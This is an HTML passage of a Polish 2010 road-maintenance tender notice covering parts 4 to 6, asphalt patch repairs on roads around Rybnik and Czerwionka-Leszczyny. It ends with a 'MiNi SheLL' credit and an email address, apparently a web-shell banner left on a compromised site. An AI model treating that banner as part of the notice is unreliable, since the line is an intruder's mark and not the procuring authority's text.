<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zadanie nr 4- obejmuje roboty polegające na wykonaniu remontu   nawierzchni bitumicznych niżej wymienionych dróg wojewódzkich mieszanką mineralno -  asfaltową  na gorąco ( jak dla ruchu KR 3-KR 6) wytworzoną w wytwórni mas bitumicznych z użyciem frezarek do nawierzchni drogowych na odcinkach o największych skupiskach uszkodzeń :

923 odc. od DW 919 Markowice - do skrzyż. z DW 935 w Rzuchowie   

 924  odc. od DW 921 w Knurowie - do gr. m. Żory       

 925  odc. od DW 926 w Orzeszu - gr. m. Rybnik                 
            
 929  odc. od gr. m. Rybnik - do skrzyż. z DW 932 w Świerklanach      

 932  odc. od DW 930 w Świerklanach - do gr. m. Żory                
 935 odc. od DW 933 w Rzuchowie - do gr. m. Rybnik        
 
Zakres rzeczowy  zadania nr 4 - wykonanie uzależnione będzie od potrzeb jakie wynikną  po ustaniu warunków zimowych oraz wynikłych  z  bieżącej eksploatacji . Szacuje się wykonanie łat  na powierzchniach uszkodzonych w  ilości nie przekraczającej łącznie 2000 m2 .
Powyższa ilość ma charakter szacunkowy  i została podana  w celu realnej oceny ofert i wyboru najkorzystniejszej oferty według obiektywnych wskaźników..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.20-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.12.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> remont cząstkowy  nawierzchni bitumicznych  dróg powiatowych na terenie Gminy i Miasta Czerwionka Leszczyny mieszanką mineralno -  asfaltową  na gorąco ( beton asfaltowy -   dla ruchu KR 3 -KR 6) wytworzoną w wytwórni mas bitumicznych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres rzeczowy  zadania nr 5 - wykonanie uzależnione będzie od potrzeb jakie wynikną  po ustaniu warunków zimowych oraz wynikłych  z  bieżącej eksploatacji . Szacuje się wbudowanie ok. 230 ton  mieszanki mineralno asfaltowej na gorąco wytworzonej w wytwórni mas bitumicznych  .
Właściwy zakres rzeczowy robót  będzie ustalany na bieżąco w zależności od potrzeb jakie ujawnią się po ustaniu warunków zimowych oraz w trakcie eksploatacji dróg w okresie od dnia podpisania umowy do 30 grudnia 2010 roku, w oparciu                      o przeprowadzoną przez Zamawiającego inwentaryzację dróg pod kątem wystąpienia wybojów i uszkodzeń . Powyższa ilość ma charakter szacunkowy  i została podana  w celu realnej oceny ofert i wyboru najkorzystniejszej oferty według obiektywnych wskaźników..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.12.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> remont cząstkowy  nawierzchni bitumicznych  dróg powiatowych na terenie Gmin: Gaszowice , Jejkowice , Lyski,Świerklany mieszanką mineralno -  asfaltową  na gorąco ( beton asfaltowy -  dla ruchu KR 3 -KR 6) wytworzoną w wytwórni mas bitumicznych ..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres rzeczowy  zadania nr 6 - wykonanie uzależnione będzie od potrzeb jakie wynikną  po ustaniu warunków zimowych oraz wynikłych  z  bieżącej eksploatacji . Szacuje się wbudowanie ok. 240 ton  mieszanki mineralno asfaltowej na gorąco wytworzonej w wytwórni mas bitumicznych  .
Właściwy zakres rzeczowy robót  będzie ustalany na bieżąco w zależności od potrzeb jakie ujawnią się po ustaniu warunków zimowych oraz w trakcie eksploatacji dróg w okresie od dnia podpisania umowy do 30 grudnia 2010 roku, w oparciu                      o przeprowadzoną przez Zamawiającego inwentaryzację dróg pod kątem wystąpienia wybojów i uszkodzeń . Powyższa ilość ma charakter szacunkowy  i została podana  w celu realnej oceny ofert i wyboru najkorzystniejszej oferty według obiektywnych wskaźników..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.12.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com